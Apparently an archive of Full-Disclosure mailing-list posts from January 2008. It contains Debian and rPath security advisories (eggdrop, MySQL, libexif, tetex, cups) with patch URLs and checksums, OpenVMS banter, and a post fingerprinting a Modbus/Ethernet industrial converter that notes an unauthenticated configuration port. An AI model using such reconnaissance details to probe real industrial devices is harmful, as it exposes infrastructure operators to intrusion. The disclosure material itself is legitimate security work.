Subject: [Full-disclosure] [SECURITY] [DSA 1448-1] New eggdrop packages fix
	arbitrary code execution
Message-ID: <20080105145244.GA13445@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1448-1                  security at debian.org
http://www.debian.org/security/                               Steve Kemp
January 05, 2008                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : eggdrop
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-2807
Debian Bug     : 427157

It was discovered that eggdrop, an advanced IRC robot, was vulnerable
to a buffer overflow which could result in a remote user executing
arbitrary code.

For the stable distribution (etch), this problem has been fixed in version
1.6.18-1etch1.

For the old stable distribution (sarge), this problem has been fixed in
version 1.6.17-3sarge1.

For the unstable distribution (sid), this problem has been fixed in
version 1.6.18-1.1

We recommend that you upgrade your eggdrop package.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1.diff.gz
    Size/MD5 checksum:    36928 cfaa50371d39bd8e2994e37fecc6ff86
  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17.orig.tar.gz
    Size/MD5 checksum:  1030413 a0f9befca240072e45cd57908bb819d0
  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1.dsc
    Size/MD5 checksum:      651 b3522add4d8a7d6ca05072fa2e733509

Architecture independent packages:

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop-data_1.6.17-3sarge1_all.deb
    Size/MD5 checksum:   410510 bb84e646defd5d2f29eef07a4bcddc35

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_alpha.deb
    Size/MD5 checksum:   602006 bd5130ad50ff7a265a1a52bccf41ee4e

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_amd64.deb
    Size/MD5 checksum:   535646 67bf2ced5e6c6b7fd36a4f31e0dd563f

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_arm.deb
    Size/MD5 checksum:   494010 03361c7e85a481bf32991fab01ebc544

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_hppa.deb
    Size/MD5 checksum:   594058 a7b7fedc13f8fff6812d02878c8ef871

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_i386.deb
    Size/MD5 checksum:   470438 f3a8dde2d859cbd72cfa8a50ef7c500d

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_ia64.deb
    Size/MD5 checksum:   733390 f5e186d15eb55594c203fc76f03fc6b4

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_m68k.deb
    Size/MD5 checksum:   439430 876fa0049e3eae163c88f4fc21ef3991

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_mips.deb
    Size/MD5 checksum:   514084 8a2c0716911a4f14a79525f4bda97558

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_mipsel.deb
    Size/MD5 checksum:   516766 f9d2046d98a283c253b6bd0890e19a76

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_powerpc.deb
    Size/MD5 checksum:   516616 5e26e11c8cc8248ab55abb047469268d

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_s390.deb
    Size/MD5 checksum:   524026 e1a9c4e11d1ef39a5e9c95fa13b82d36

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.17-3sarge1_sparc.deb
    Size/MD5 checksum:   496820 f6226930abbc54b1c9f6f12ca16b0c4b


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18.orig.tar.gz
    Size/MD5 checksum:  1025608 c2734a51926bdf0380d8bb53f5a7b2ee
  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1.dsc
    Size/MD5 checksum:      642 51a806bb57b49ad48aaf33de7ee68a22
  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1.diff.gz
    Size/MD5 checksum:     7735 1a4235a0c37b8ceda4f9a6c7d959caac

Architecture independent packages:

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop-data_1.6.18-1etch1_all.deb
    Size/MD5 checksum:   412462 68732ebe9e8a2acc3c0f6d014c40117d

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_alpha.deb
    Size/MD5 checksum:   596918 34ee4259e293b79c6e070b0d6c674227

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_amd64.deb
    Size/MD5 checksum:   537278 1f50307bb1f23c45a66b2727b7f1def8

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_arm.deb
    Size/MD5 checksum:   498644 9df0fb22c80946159524c92b57427ffe

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_hppa.deb
    Size/MD5 checksum:   599774 1e37281849d63b4094cca6f80231f1df

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_i386.deb
    Size/MD5 checksum:   476308 cd53f77bd94f508fe22891368c7733a5

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_ia64.deb
    Size/MD5 checksum:   755256 3d0786df79f2a112a8ddf2c13b1a25b0

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_mips.deb
    Size/MD5 checksum:   534334 992714b10e468def8d919d374f99b1f1

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_mipsel.deb
    Size/MD5 checksum:   537058 d5a5471f4e5dd41638886c5747820a4f

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_powerpc.deb
    Size/MD5 checksum:   522180 9aed03927df0bfd92ce68f1832881cbc

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_s390.deb
    Size/MD5 checksum:   529796 224f6400c4c880fc6534e63ace1d1979

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/e/eggdrop/eggdrop_1.6.18-1etch1_sparc.deb
    Size/MD5 checksum:   491240 4c0efbfedc4604ae67edaf8eae2f3229


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHf5mBwM/Gs81MDZ0RAu6jAJsFcE6kvgje2/y8oI2ihOQTG3gdmwCfblk1
WvyI841KiBtqSljc1cetSxw=
=NfoT
-----END PGP SIGNATURE-----



From gmaggro at rogers.com  Sat Jan  5 19:01:23 2008
From: gmaggro at rogers.com (gmaggro)
Date: Sat, 05 Jan 2008 14:01:23 -0500
Subject: [Full-disclosure] scada/plc gear
Message-ID: <477FD403.4060605@rogers.com>

OK, having done some digging a decent little chunk of industrial 
automation gear has started coming my way; 1 of 6 pieces. All totaled, 
roughly under $1000. Small standalone stuff for now; the shipping on 
populated PLC chassis like SLC-500 stuff is problematic.

If people have specific technical questions, want a script run against a 
piece of gear or a custom protocol capture done I will entertain such 
requests. I am also willing to open the cases and pick up the soldering 
iron, attempt rom/firmware dumps, etc.

Are there any particular tests or tools someone would like me to work 
into my routine right from the start?

Hardware piece #1 is a Kohler Power Systems modbus/ethernet converter, 
pn# GM40165.

So far, nmap (4.52) has been detecting the modbus running on port 
502/tcp as asa-appl-proto. There is not a great deal of information out 
there about this protocol. The email contact associated with the port in 
some /etc/services files (ddube at modicon.com) is disabled, and the domain 
redirects to an industrial automation company (telemecanique.com). 
Running/OS details indicate Enerdis or Lantronix embedded. MAC prefix is 
00:20:4A (Pronet Gmbh). I suppose I could have just posted the nmap 
output, but figured that might annoy people unduly.

Perhaps it would be worth renaming 'asa-appl-proto' on 502 to 'modbus' 
or something related? Just a suggestion to make it clearer for some 
people. In any case, this is mitigated by scanning with the -C option 
which grabs info from 80 and 161 clearly identifying it as being a 
modbus related device, the sysDescr stating "Modbus/TCP to RTU Bridge". 
And oh yeah, it has a wide open text configuration interface on 9999.

Handy/Interesting modbus tcp/udp links:

http://jamod.sourceforge.net/development/tcp_master_howto.html
http://jamod.sourceforge.net/kbase/protocol.html



From announce-noreply at rpath.com  Sat Jan  5 01:12:13 2008
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Fri, 04 Jan 2008 20:12:13 -0500
Subject: [Full-disclosure] rPSA-2008-0006-1 libexif
Message-ID: <477ed96d.JrvHoxWrGvDDVYH1%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0006-1
Published: 2008-01-04
Products:
    rPath Linux 1

Rating: Minor
Exposure Level Classification:
    Indirect User Deterministic Unauthorized Access
Updated Versions:
    libexif=conary.rpath.com at rpl:1/0.6.16-0.2-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2068

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6351
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6352

Description:
    Previous versions of the libexif package contain multiple
    vulnerabilities, the most serious of which allows user-assisted
    attackers to execute arbitrary code using images with maliciously
    crafted EXIF tags.

http://wiki.rpath.com/Advisories:rPSA-2008-0006

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html



From announce-noreply at rpath.com  Sat Jan  5 01:13:02 2008
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Fri, 04 Jan 2008 20:13:02 -0500
Subject: [Full-disclosure] rPSA-2008-0007-1 tetex tetex-afm tetex-dvips
 tetex-fonts tetex-latex tetex-xdvi
Message-ID: <477ed99e.98bJCpB2WV3QOPnF%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0007-1
Published: 2008-01-04
Products:
    rPath Linux 1

Rating: Minor
Exposure Level Classification:
    Indirect User Deterministic Unauthorized Access
Updated Versions:
    tetex=conary.rpath.com at rpl:1/2.0.2-28.10-1
    tetex-afm=conary.rpath.com at rpl:1/2.0.2-28.10-1
    tetex-dvips=conary.rpath.com at rpl:1/2.0.2-28.10-1
    tetex-fonts=conary.rpath.com at rpl:1/2.0.2-28.10-1
    tetex-latex=conary.rpath.com at rpl:1/2.0.2-28.10-1
    tetex-xdvi=conary.rpath.com at rpl:1/2.0.2-28.10-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-1972

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4033

Description:
    Previous versions of the tetex package are vulnerable to an Arbitrary
    Code Execution attack in which user-assisted attackers can use malformed
    font data to cause a buffer overflow in applications that use t1lib.

http://wiki.rpath.com/Advisories:rPSA-2008-0007

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html



From announce-noreply at rpath.com  Sat Jan  5 15:11:53 2008
From: announce-noreply at rpath.com (rPath Update Announcements)
Date: Sat, 05 Jan 2008 10:11:53 -0500
Subject: [Full-disclosure] rPSA-2008-0008-1 cups
Message-ID: <477f9e39.fGK8LtF8AyYDvYH5%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0008-1
Published: 2008-01-05
Products:
    rPath Linux 1

Rating: Informational
Exposure Level Classification:
    Local Weakness
Updated Versions:
    cups=conary.rpath.com at rpl:1/1.1.23-14.5-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2009

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5848

Description:
    Previous versions of the cups package contain a buffer-overflow
    weakness.  It is not believed that this weakness can be exploited
    to execute malicious code.

http://wiki.rpath.com/Advisories:rPSA-2008-0008

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html



From oshadi at lfod.info  Fri Jan  4 23:02:47 2008
From: oshadi at lfod.info (Ishan Oshadi Jayawardene)
Date: Sat, 05 Jan 2008 00:02:47 +0100
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
In-Reply-To: <452214.1315441199301228241.JavaMail.servlet@perfora>
References: <452214.1315441199301228241.JavaMail.servlet@perfora>
Message-ID: <477EBB17.90607@lfod.info>

Once a so-called security expert was pen-testing my VMS shop. We were 
having a nice chat while his eval version of GFI LANguard finished the 
scan, and got to talk about VMS. He didn't believe in the robust 
security of VMS and told me to do a search for vms on bugtraq, and see 
how many results came up.
So I did, and was horrified when I saw thousands of results... Until I 
noticed that the matched string in all the (barring perhaps 1 in 10000) 
results was "VMs"; not "VMS" or "vms".

(This was some years ago. The bugtraq search function's improved now.)

Randal T. Rioux wrote:
>> Valdis.Kletnieks at vt.edu said:
> 
>> Bonus points for knowing that VMS was mostly written in Bliss/32 or some 
>> such, and VM and MVS were a mixture of assembler and (later on) PL/S. 
>> No C knowledge needed for those critters...
> 
> OpenVMS is less than 40% Blissful... though I'm not familiar with the original source (wasn't it written on stone tablets?). About 50% is C, with a healthy mix of obsoletes making the difference. How something so elegant could be spawned from such chaos is beyond me.
> 
> Mostly, the VMS basic OS utilities are Bliss-based (think: GNU). 
> 
> I really wish HP would open OpenVMS before they kill it.
> 
> Security relevance: UNHACKABLE! <grin>
> 
> Randy
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



From jmm at debian.org  Sun Jan  6 18:04:18 2008
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Sun, 6 Jan 2008 19:04:18 +0100
Subject: [Full-disclosure] [SECURITY] [DSA 1451-1] New mysql-dfsg-5.0
	packages fix several	vulnerabilities
Message-ID: <20080106180418.GA6187@galadriel.inutil.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1451-1                  security at debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
January 06, 2008                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : mysql-dfsg-5.0
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-3781 CVE-2007-5969 CVE-2007-6304

Several local/remote vulnerabilities have been discovered in the MySQL
database server. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2007-3781

    It was discovered that privilege validation for the source table
    of CREATE TABLE LIKE statements was insufficiently enforced, which
    might lead to information disclosure. This is only exploitable by
    authenticated users.

CVE-2007-5969

    It was discovered that symbolic links were handled insecurely during
    the creation of tables with DATA DIRECTORY or INDEX DIRECTORY
    statements, which might lead to denial of service by overwriting
    data. This is only exploitable by authenticated users.

CVE-2007-6304

    It was discovered that queries to data in a FEDERATED table can
    lead to a crash of the local database server, if the remote server
    returns information with less columns than expected, resulting in
    denial of service.

For the unstable distribution (sid), these problems have been fixed in
version 5.0.51-1.

For the stable distribution (etch), these problems have been fixed in
version 5.0.32-7etch4.

The the old stable distribution (sarge) doesn't contain mysql-dfsg-5.0.

We recommend that you upgrade your mysql-dfsg-5.0 packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 4.0 (stable)
- -------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch4.dsc
    Size/MD5 checksum:     1117 b448b40bc145106d8966508c9fa0c45b
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch4.diff.gz
    Size/MD5 checksum:   161485 31b9376a42bca78d5ac7fda259aff1ca
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32.orig.tar.gz
    Size/MD5 checksum: 16439441 f99df050b0b847adf7702b44e79ac877

Architecture independent packages:

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client_5.0.32-7etch4_all.deb
    Size/MD5 checksum:    45454 45ff1308d626044f160a0b3fe89c9a34
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server_5.0.32-7etch4_all.deb
    Size/MD5 checksum:    47532 d23b1ed2a3fd2ba381dd200c11c86b31
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-common_5.0.32-7etch4_all.deb
    Size/MD5 checksum:    53798 517bf124cde29920eb3b24a5adbf435d

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch4_alpha.deb
    Size/MD5 checksum:  8912516 3983707301e692ba4ee6566f421c173e
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch4_alpha.deb
    Size/MD5 checksum:  1949958 16c2af9a5dd3f4fd0b67a0bb9d268c13
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch4_alpha.deb
    Size/MD5 checksum:    47574 7f993fb934a3d889eca00ad7458d201b
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch4_alpha.deb
    Size/MD5 checksum:  8407960 17c00a7f8e950efb3cf4e83c63f8efa6
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch4_alpha.deb
    Size/MD5 checksum: 27367792 ed5ec8d7ef2b8476d5271b53a4d20931

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch4_amd64.deb
    Size/MD5 checksum:  7375976 01018314a32846aeabd3feed31b22135
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch4_amd64.deb
    Size/MD5 checksum:  1829734 42ab75fdb7d1534041d17e6b74dfb5dc
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch4_amd64.deb
    Size/MD5 checksum:    47548 6a16b6f6d8b12a924c804e859acd99a0
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch4_amd64.deb
    Size/MD5 checksum: 25939478 8e23c2e305c1f374074a568f3b84dbd3
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch4_amd64.deb
    Size/MD5 checksum:  7546720 9d184ca3dd41066d55f11a9ab2c75e11

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch4_arm.deb
    Size/MD5 checksum:  6928896 28be799c6790473b69d312b78b5cbeb6
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch4_arm.deb
    Size/MD5 checksum:  1747492 6a3557a1b84ef68463aa172952c42db3
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch4_arm.deb
    Size/MD5 checksum:    47584 3322d9cfd5e3defbc71985e08fce07ab
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch4_arm.deb
    Size/MD5 checksum:  7204274 f158e1a4da87a26b0d0dd2fd1ee0702f
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch4_arm.deb
    Size/MD5 checksum: 25345778 1994637d98c3fe0847a0b319f92a58d8

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch4_hppa.deb
    Size/MD5 checksum:  1920058 b2999058fa46d18e576cf44cccffbc0a
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch4_hppa.deb
    Size/MD5 checksum:    47550 2ac205e164e6f4a21982b98482b6ec70
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch4_hppa.deb
    Size/MD5 checksum:  8004732 50a77fe7efc50639fb79f5c220a9f3c2
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch4_hppa.deb
    Size/MD5 checksum: 27055306 6efd1c4ffe384cfe9824f90a2e7635b9
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch4_hppa.deb
    Size/MD5 checksum:  8045346 1f7c6279b669a1513afcffb1c3c9820b

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch4_i386.deb
    Size/MD5 checksum:  6967518 90e037769d009b66b6646e2bd642243b
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch4_i386.deb
    Size/MD5 checksum:  7190322 6c04a633ab66eb1db06a455eeb373e18
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch4_i386.deb
    Size/MD5 checksum:    47556 badcb9d2aee69d6d8b71cea1d06567e1
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch4_i386.deb
    Size/MD5 checksum:  1791490 f12450ac3d0cc9dbaa35d59b85a83180
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch4_i386.deb
    Size/MD5 checksum: 25229424 4e3a500d94d752e4f9d3e446d39ae88b

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch4_ia64.deb
    Size/MD5 checksum: 30408484 ba2c4576d79e420139032395137be316
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch4_ia64.deb
    Size/MD5 checksum:  2114788 2744d8310d333a15fd5ed2cca82cdf02
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch4_ia64.deb
    Size/MD5 checksum:    47548 03c625c1d32fae4a5afc74a59bc3d0dd
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch4_ia64.deb
    Size/MD5 checksum: 10341340 99101f3b7ae403da7dfde8d113683455
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch4_ia64.deb
    Size/MD5 checksum:  9736582 2fc103b7beb1ae8c0fa8e035ecb938fa

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch4_mips.deb
    Size/MD5 checksum:  1835278 5538a105c6cd230b83d3f87ab3bd80bd
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch4_mips.deb
    Size/MD5 checksum: 26339182 742476c64082de4d6fe36a649f5e6b2a
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch4_mips.deb
    Size/MD5 checksum:    47552 3332a7b97502a686f1100baa6efe1839
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch4_mips.deb
    Size/MD5 checksum:  7655706 926e3f17e24bffa92251ab72a5059bcf
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch4_mips.deb
    Size/MD5 checksum:  7748160 85dee0ad842d92b13f1c825698f8f24b

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch4_mipsel.deb
    Size/MD5 checksum:  1788990 d7f4c92c38975ba941f5c99fb5465e52
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch4_mipsel.deb
    Size/MD5 checksum:  7560122 4880263fde3bee027a64e73c3393b64c
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch4_mipsel.deb
    Size/MD5 checksum:    47552 a687e4ca58c343c338ee95e2e3e88c24
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch4_mipsel.deb
    Size/MD5 checksum: 25844698 60de7a718cc33de8d1af0e4efffe9e5d
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch4_mipsel.deb
    Size/MD5 checksum:  7639674 46049fa456a0b401ccec2a81c5587212

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch4_powerpc.deb
    Size/MD5 checksum: 26163868 af7b2215ce8821b3ed5f05435492e5f4
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch4_powerpc.deb
    Size/MD5 checksum:    47554 086bce94d2993e7943c995bf1fa097fc
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch4_powerpc.deb
    Size/MD5 checksum:  1832116 dbfda8d56ffb5a988b6a01eb093e3d57
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch4_powerpc.deb
    Size/MD5 checksum:  7572800 44021e7ee4f7ceb2bd5f4684a90798dc
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch4_powerpc.deb
    Size/MD5 checksum:  7511456 da087cf4d448baec46b5057e9bbd8e0f

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch4_s390.deb
    Size/MD5 checksum: 26763368 031740301ad6f5e15876fbb959a2f937
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch4_s390.deb
    Size/MD5 checksum:  7412974 0e9611acc3d3ad40ecf2cef21daa35f7
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch4_s390.deb
    Size/MD5 checksum:  7507600 fc97e1f896237b8a6150e520d9ab21fd
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch4_s390.deb
    Size/MD5 checksum:    47552 67c7c6cf8236017b8c1cbe134f96ec27
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch4_s390.deb
    Size/MD5 checksum:  1951428 54c2d83136aa5de7c4aaae7c814817d5

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch4_sparc.deb
    Size/MD5 checksum:  1797188 668c5eb76297d82fa52df320e89f39c7
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch4_sparc.deb
    Size/MD5 checksum: 25424640 da894b39ece9c2b0143724a2571207a7
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch4_sparc.deb
    Size/MD5 checksum:  7152702 311913d32eadfa52c494fe4bbe748cb6
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch4_sparc.deb
    Size/MD5 checksum:    47550 dcd7f1dbbc566ac28e5abd94978b603c
  http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch4_sparc.deb
    Size/MD5 checksum:  7013012 2b3ac8be159f956779af823761d72262


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
